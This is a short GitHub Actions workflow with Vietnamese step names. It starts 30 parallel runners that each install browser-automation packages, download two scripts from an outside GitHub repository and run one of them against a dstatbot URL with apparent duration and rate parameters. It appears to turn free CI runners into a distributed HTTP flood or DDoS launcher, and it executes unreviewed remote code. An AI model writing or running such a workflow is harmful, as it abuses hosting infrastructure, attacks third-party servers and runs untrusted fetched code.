name: Multi Actions
on: {push: {branches: [main]}}
jobs:
  run:
    runs-on: ubuntu-latest
    strategy: {matrix: {runner: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30]}}
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Lệnh #1
        run: npm i hpack puppeteer-real-browser
      - name: Lệnh #2
        run: chmod 777 *
      - name: Lệnh #3
        run: curl -L -o c1.js https://raw.githubusercontent.com/occhoahihihih/helloworld/main/c1.js
      - name: Lệnh #4
        run: curl -L -o c2.js https://raw.githubusercontent.com/occhoahihihih/helloworld/main/c2.js
      - name: Lệnh #5
        run: node c1 https://captcha.dstatbot.win/12493314-0255-451b-830f-5f7ed9385aa5 260 2 8
